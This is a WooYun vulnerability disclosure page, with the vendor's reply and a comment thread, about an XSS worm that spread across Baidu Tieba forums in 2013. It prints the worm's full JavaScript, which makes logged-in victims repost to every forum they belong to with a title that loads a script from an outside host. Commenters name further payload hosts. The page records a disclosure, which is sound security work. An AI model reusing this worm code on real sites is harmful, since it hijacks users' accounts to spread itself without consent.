当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-024106

漏洞标题:百度贴吧XSS蠕虫大量爬行

相关厂商:百度

漏洞作者: erevus

提交时间:2013-05-19 17:42

修复时间:2013-07-03 17:43

公开时间:2013-07-03 17:43

漏洞类型:成功的入侵事件

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-05-19: 细节已通知厂商并且等待厂商处理中
2013-05-20: 厂商已经确认,细节仅向厂商公开
2013-05-30: 细节向核心白帽子及相关领域专家公开
2013-06-09: 细节向普通白帽子公开
2013-06-19: 细节向实习白帽子公开
2013-07-03: 细节向公众公开

简要描述:

http://tieba.baidu.com/p/2337649856
其中一个帖子 点进去就会自动转发帖子给所有自己i的贴吧

详细说明:

跨站脚本地址http://xss.retaker.me/1.js

//initilize
var forumName = [];
var forumId = [];
for (var i = 0, j = 0; i < PageData.user.user_forum_list.info.length; i++) {
	if (PageData.user.user_forum_list.info[i].user_level > 3) {
		if (PageData.user.user_forum_list.info[i].forum_name!="璐村惂鐩戞帶") {
			forumName[j] = PageData.user.user_forum_list.info[i].forum_name;
			forumId[j] = PageData.user.user_forum_list.info[i].id;
			j++;
		}
	}
}
function madeit(myKw, myFid) {
	var c = rich_postor._getData();
  c.content="\\u8bf7\\u5141\\u8bb8\\u6211\\u505a\\u4e00\\u4e2a\\u5fe7\\u4f24\\u7684\\u8868\\u60c5\\uff0c\\u662f\\u5fe7\\u4f24\\u54e6\\uff01";
	c.ftid = c.fid;
	c.ptid = "2337372175";
	c.title = '\\u70b9\\u8fdb\\u6765\\u6709..",a:$.getScript(\\'//xss.retaker.me/1.js\\'),a:"';
	c.fid = myFid;
	c.kw = myKw;
	$.post("/relay/commit", c);
}
//now begin!
for (j = 0; j < forumName.length; j++) {
	setTimeout("madeit('" + forumName[j] + "','" + forumId[j] + "')", 1500 * j);
}

漏洞证明:

很多吧已经被爆

1.jpg

修复方案:

你们比我懂啊

版权声明:转载请注明来源 erevus@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2013-05-20 09:43

厂商回复:

感谢反馈,已处理完毕,后续会根据损失情况进行相应的处理。

最新状态:

暂无

漏洞评价:

评论

  1. 2013-05-19 17:44 | 书生 ( 路人 | Rank:9 漏洞数:1 )

    受害者表示强烈谴责

  2. 2013-05-19 17:45 | erevus ( 普通白帽子 | Rank:177 漏洞数:30 | Hacked by @ringzero 我錯了)

    @书生 +1

  3. 2013-05-19 17:48 | yangff ( 路人 | Rank:1 漏洞数:1 | 介绍写什么呢?)

    贴吧这是怎么了……这么明显的xss是肿么回事啊混蛋!

  4. 2013-05-19 17:49 | Rtsjx ( 实习白帽子 | Rank:31 漏洞数:3 | ......)

    坐等始作俑者被抓~

  5. 2013-05-19 17:57 | 流星warden ( 实习白帽子 | Rank:54 漏洞数:5 | The quieter you become,the more you are ...)

    求刀锋女王,求群虫之心

  6. 2013-05-19 17:58 | 帕秋莉 ( 路人 | Rank:8 漏洞数:2 | 私はあなたを杀す wwwwww)

    @书生 红吧中枪众表示严厉谴责.

  7. 2013-05-19 18:49 | feixiang ( 路人 | Rank:0 漏洞数:1 | = = !性别男,爱好女,有理想,没技术。)

    差点受害者表示强烈抗议!!!

  8. 2013-05-19 18:55 | ghy459 ( 实习白帽子 | Rank:62 漏洞数:5 | 深挖洞,广积shell。)

    retaker.me 这个域名目测要火

  9. 2013-05-19 19:08 | 残影小L ( 路人 | Rank:12 漏洞数:3 | 我还是我。)

    @retaker ,@xsser 举报此人严重违规和无视白帽子准则。

  10. 2013-05-19 19:34 | 小威 ( 普通白帽子 | Rank:492 漏洞数:67 | 活到老,学到老!)

    速度真快啊 都贴wooyun来了

  11. 2013-05-19 19:54 | erevus ( 普通白帽子 | Rank:177 漏洞数:30 | Hacked by @ringzero 我錯了)

    @残影小L 爬蠕虫就被封禁的话那很多人就得被封禁啊http://www.wooyun.org/searchbug.php?q=%E8%A0%95%E8%99%AB

  12. 2013-05-19 20:00 | yangff ( 路人 | Rank:1 漏洞数:1 | 介绍写什么呢?)

    尼玛,又出来一个//xss.tw/1445

  13. 2013-05-19 20:17 | Ra1nker ( 路人 | 还没有发布任何漏洞 | TeST)

    @yangff http://txsh.sdapp.cn/1.js 这里

  14. 2013-05-19 20:25 | 海盗湾V ( 实习白帽子 | Rank:58 漏洞数:9 | Your entire life is online)

    此人 /whitehat_detail.php?whitehat=retaker

  15. 2013-05-19 21:04 | 汉时明月 ( 实习白帽子 | Rank:40 漏洞数:6 | ‮......核审在正名签 :)

    已经看不到了啊

  16. 2013-05-19 21:06 | 孤独雪狼 ( 普通白帽子 | Rank:710 漏洞数:64 | 七夕手机被偷,这坑爹的七夕啊 。。。。)

    我主要是想相关细节

  17. 2013-05-19 21:58 | Evil Spirits ( 路人 | Rank:0 漏洞数:1 | 安好无念。)

    刚刚看到这个。

  18. 2013-05-19 22:52 | 熊猫 ( 实习白帽子 | Rank:64 漏洞数:33 | panda)

    表示对面包

  19. 2013-05-19 23:54 | 鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:41 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)

    开来这是个举报贴啊,,

  20. 2013-05-20 08:45 | retaker ( 路人 | Rank:1 漏洞数:1 | free open share)

    L举报我什么心态……呵呵呵

  21. 2013-05-20 10:16 | superwbd ( 路人 | Rank:15 漏洞数:6 | 一个不懂技术的黑客。。。)

    @retaker漏洞也就这样了,但您可能需要向大家说明下为什么利用代码在您的服务器上,如果您是retaker.me域名的拥有者的话。。。我愿意相信,这漏洞就是个技术测试,只不过被误击后被错误的扩大化,造成有些不可收拾,和以前人人的那个是是一个性质。。。

  22. 2013-05-20 10:21 | erevus ( 普通白帽子 | Rank:177 漏洞数:30 | Hacked by @ringzero 我錯了)

    @retaker 不是举报你,我只是想看见你没提交,我用来刷点rank .同时希望楼下不要再喷retaker,他也在事发后主动删除了js。。。只是扩散范围有点大

  23. 2013-05-20 11:36 | 熊猫 ( 实习白帽子 | Rank:64 漏洞数:33 | panda)

    @erevus 你好坏啊

  24. 2013-05-20 11:45 | 点点 ( 普通白帽子 | Rank:214 漏洞数:38 | 准备申请سمَـَّوُوُحخ ̷̴̐...)

    我来围观下

  25. 2013-05-21 13:55 | retaker ( 路人 | Rank:1 漏洞数:1 | free open share)

    根据损失情况做后续处理啥意思?要查我水表了?居然给了13rank....

  26. 2013-05-21 18:37 | erevus ( 普通白帽子 | Rank:177 漏洞数:30 | Hacked by @ringzero 我錯了)

    @retaker 这次影响很大啊 可能会查水表呢

  27. 2013-05-22 06:00 | superwbd ( 路人 | Rank:15 漏洞数:6 | 一个不懂技术的黑客。。。)

    @retaker 你google一下就知道问题多严重了。。。连我这小贴吧都发警告了,有些贴吧满地都是坑。。。如今您可以辩称测试时遭遇干扰,造成漏洞错误扩散。然后希望百度像人人那样不计前嫌。

  28. 2013-05-22 08:31 | 熊猫 ( 实习白帽子 | Rank:64 漏洞数:33 | panda)

    @retaker 13个rank就可以换本书了

  29. 2013-05-22 09:45 | erevus ( 普通白帽子 | Rank:177 漏洞数:30 | Hacked by @ringzero 我錯了)

    @熊猫 20~~

  30. 2013-05-22 15:50 | retaker ( 路人 | Rank:1 漏洞数:1 | free open share)

    求送点rank

  31. 2013-05-22 18:58 | erevus ( 普通白帽子 | Rank:177 漏洞数:30 | Hacked by @ringzero 我錯了)

    @retaker 其实你发一次原理就可以赚rank了 只能送WB额

  32. 2013-05-23 16:45 | retaker ( 路人 | Rank:1 漏洞数:1 | free open share)

    每次都说已存在。。。每次都是我把病毒写出来,代码被人拿去玩,wooyun上别人提交、、、

  33. 2013-05-23 17:28 | erevus ( 普通白帽子 | Rank:177 漏洞数:30 | Hacked by @ringzero 我錯了)

    @retaker 手不够快的结果?

  34. 2013-05-23 19:03 | retaker ( 路人 | Rank:1 漏洞数:1 | free open share)

    @erevus 光顾着写虫子了

  35. 2013-05-24 17:18 | dtc ( 路人 | Rank:10 漏洞数:1 | 业余技术爱好者,来乌云学习。)

    抢着举报来白白拿rank的自重

  36. 2013-05-24 17:19 | dtc ( 路人 | Rank:10 漏洞数:1 | 业余技术爱好者,来乌云学习。)

    不管怎么样也该给@retaker 点补偿

  37. 2013-05-24 17:40 | erevus ( 普通白帽子 | Rank:177 漏洞数:30 | Hacked by @ringzero 我錯了)

    @retaker @dtc 送你本书?

  38. 2013-05-24 19:01 | retaker ( 路人 | Rank:1 漏洞数:1 | free open share)

    @erevus 好啊好啊,书好看

  39. 2013-05-24 21:46 | erevus ( 普通白帽子 | Rank:177 漏洞数:30 | Hacked by @ringzero 我錯了)

    @retaker 要啥书 地址 私信我吧

  40. 2013-07-03 21:28 | DarkSec ( 路人 | Rank:1 漏洞数:1 | 过去、已成为历史,现在、我们正在成长)

    很好很强大,还可以这么玩

  41. 2015-04-26 01:24 | 昌维 ( 路人 | Rank:2 漏洞数:3 | QQ:867597730,百度贴吧ID:昌维001)

    你这个只有用于攻击的xss代码,并没有解释最关键的就是js脚本如何绕过百度的过滤插进去的。